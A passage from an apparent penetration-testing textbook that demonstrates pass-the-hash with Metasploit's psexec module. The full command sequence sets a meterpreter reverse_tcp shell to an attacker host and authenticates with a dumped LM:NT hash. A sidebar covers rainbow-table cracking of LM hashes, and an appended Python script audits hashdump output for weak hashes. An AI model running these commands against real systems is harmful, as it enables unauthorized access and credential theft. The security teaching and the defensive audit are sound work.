Chapter 6

was longer than 14 characters, Windows can no longer store an LM hash, and it uses the standard aad3b435 . . . string, which represents a blank password.

Pass the Hash

In the preceding example, we ran into a slight complication: We have the administrator's username and password hashes, but we can't crack the password in a reasonable time frame. If we don't know the password, how can we log into additional machines and potentially compromise more systems with this one user account?

We can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. Metasploit's windows/smb/psexec module makes this all possible, as shown here:

msf> use windows/smb/psexec
msf exploit(psexec)> set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec)> set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(psexec)> set LPORT 443
LPORT => 443
msf exploit(psexec)> set RHOST 192.168.33.130
RHOST => 192.168.33.130
. . . SNIP . . .
msf exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
SMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
msf exploit(psexec)> exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...

THE PROBLEM WITH LM HASHES

Just for fun, try the following: Change your password to something complex that is 14 characters or less. Then extract the password hashes from the system with hashdump and copy the first hash value (such as the portion beginning with aad3b435 in the preceding example), which is the LM hash. Next, search for one of the many online password crackers and submit your hash value. Wait a few minutes, click the refresh button a couple of times, and your password should be cracked. (Be careful not to use one of your real passwords, because the information is frequently posted to everyone who visits the site!)

This is a rainbow table attack. A rainbow table is a precomputed table used for reversing cryptographic hash functions, usually for cracking passwords. Rainbow tables use every combination of characters including 1–7, a–z, special symbols, and spaces. When you submit your hash to an online cracker, the site's server searches through gigabytes of rainbow tables for your specific hash.
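As an added audit example (not code from the book), the following Python parses hashdump output in the user:RID:LM:NT::: form shown above and flags any account that still stores a real LM hash, which is exactly what makes the rainbow-table lookup in this sidebar work, as well as any account whose NT hash is that of an empty password. The sample dump is constructed: only the Administrator hashes come from the page, the svc_backup LM value is made up, and the empty-password NT hash constant is the standard MD4 of an empty string.

```python
import re
from typing import Dict, List, Optional
# Value Windows stores in the LM field when no LM hash exists (as the page
# notes: blank password, or a password longer than 14 characters).
BLANK_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password (MD4 of the empty UTF-16LE string).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# hashdump prints one account per line: user:RID:LM hash:NT hash:::
_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

def parse_hashdump_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one hashdump line, or None if it is not one."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["lm"], rec["nt"] = rec["lm"].lower(), rec["nt"].lower()
    return rec

def audit_hashdump(dump: str) -> List[Dict[str, object]]:
    """Flag accounts that store an LM hash (rainbow-table reversible) or an empty password."""
    findings = []
    for line in dump.splitlines():
        rec = parse_hashdump_line(line)
        if rec is None:
            continue  # banner or status line, not an account
        findings.append({
            "user": rec["user"],
            "rid": int(rec["rid"]),
            "lm_stored": rec["lm"] != BLANK_LM_HASH,
            "empty_password": rec["nt"] == EMPTY_NT_HASH,
        })
    return findings

# Constructed sample dump: the Administrator hashes are the ones shown on the
# page; the svc_backup LM hash is made up to exercise the flagged case.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:b75989f65d1e04af7625ed712ac36c29:::
[*] Dumping password hashes...
"""

if __name__ == "__main__":
    for finding in audit_hashdump(SAMPLE_DUMP):
        print(finding)
```

Any account reported with lm_stored set to True has a password of 14 characters or fewer that the online crackers described above can reverse; the fix is a longer password or disabling LM hash storage.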